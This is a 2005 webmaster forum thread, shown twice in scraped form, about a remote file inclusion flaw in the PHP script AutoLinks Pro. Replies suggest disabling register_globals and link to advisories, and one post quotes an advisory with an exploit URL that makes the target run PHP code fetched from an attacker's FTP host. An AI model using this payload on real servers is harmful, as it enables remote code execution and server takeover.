Autolinks Pro hacked - who knows help? - GoFuckYourself.com

Jessy-Star · 09-04-2005, 01:42 PM

Hey guys,

there is a security vulnerability in Autolinks Pro. Hackers can get access to your server and install scripts to attack other servers.

http://www.securitytracker.com/alert...g/1014815.html

Anyone who has the same problems?
Does anyone know a solution?

Please help!

Peggy

ICQ: 307824338

chaze · 09-04-2005, 01:46 PM

We do not use php with our version of AG pro.

It's cgi ??

Realpascal · 09-04-2005, 01:47 PM

Set your register_globals off in php.ini.

stevo · 09-04-2005, 01:48 PM

Description: A vulnerability was reported in AutoLinks Pro. A remote user can execute arbitrary code on the target system.

The software does not properly validate user-supplied input in the 'alpath' parameter. If register_globals is set to 'on' in the 'php.ini' configuration file, a remote user can supply a specially crafted URL to cause the target system to include and execute arbitrary PHP code from a remote location. The PHP code, including operating system commands, will run with the privileges of the target web service.

The flaw resides in 'autolinks/al_initialize.php'.

http://[target]/al_initialize.php?alpath=ftp://[attacker]/

The above URL will cause the PHP code in the 'al_functions.php' file on the 'attacker' FTP site to be executed on the target system.

Whats your website?

FrankWhite · 09-04-2005, 01:49 PM

http://www.securityfocus.com/bid/14686

mrkris · 09-04-2005, 01:50 PM

wow, basic shit ... retarded ...

dubsix · 09-07-2005, 05:26 AM

FYI, this has nothing to do with register globals, vars are still picked up, it's just a remote include

09-04-2005, 01:42 PM	#1
Jessy-Star Registered User Join Date: Nov 2004 Posts: 30	Autolinks Pro hacked - who knows help? Hey guys, there is a security vulnerability in Autolinks Pro. Hackers can get access to your server and install scripts to attack other servers. http://www.securitytracker.com/alert...g/1014815.html Anyone who has the same problems? Does anyone know a solution? Please help! Peggy ICQ: 307824338

09-04-2005, 01:47 PM	#3
Realpascal Confirmed User Join Date: Jun 2005 Location: Dutchie !!! Posts: 2,119	Set your register_globals off in php.ini. __________________ OMGWTFBBQ

09-04-2005, 01:48 PM	#4
stevo Confirmed User Join Date: Aug 2002 Location: Orlando, Florida Posts: 2,051	Description: A vulnerability was reported in AutoLinks Pro. A remote user can execute arbitrary code on the target system. The software does not properly validate user-supplied input in the 'alpath' parameter. If register_globals is set to 'on' in the 'php.ini' configuration file, a remote user can supply a specially crafted URL to cause the target system to include and execute arbitrary PHP code from a remote location. The PHP code, including operating system commands, will run with the privileges of the target web service. The flaw resides in 'autolinks/al_initialize.php'. http://[target]/al_initialize.php?alpath=ftp://[attacker]/ The above URL will cause the PHP code in the 'al_functions.php' file on the 'attacker' FTP site to be executed on the target system. Whats your website? Last edited by stevo; 09-04-2005 at 01:50 PM..

09-04-2005, 01:50 PM	#6
mrkris Confirmed User Join Date: May 2005 Posts: 2,737	wow, basic shit ... retarded ... __________________ PHP-MySQL-Rails \| ICQ: 342500546

09-04-2005, 01:46 PM	#2
chaze Confirmed User Industry Role: Join Date: Aug 2002 Posts: 9,752	We do not use php with our version of AG pro. It's cgi ??

09-04-2005, 01:49 PM	#5
FrankWhite Confirmed User Join Date: Nov 2002 Location: nyc Posts: 3,540	http://www.securityfocus.com/bid/14686

09-07-2005, 05:26 AM	#7
dubsix Confirmed User Industry Role: Join Date: Dec 2004 Posts: 363	FYI, this has nothing to do with register globals, vars are still picked up, it's just a remote include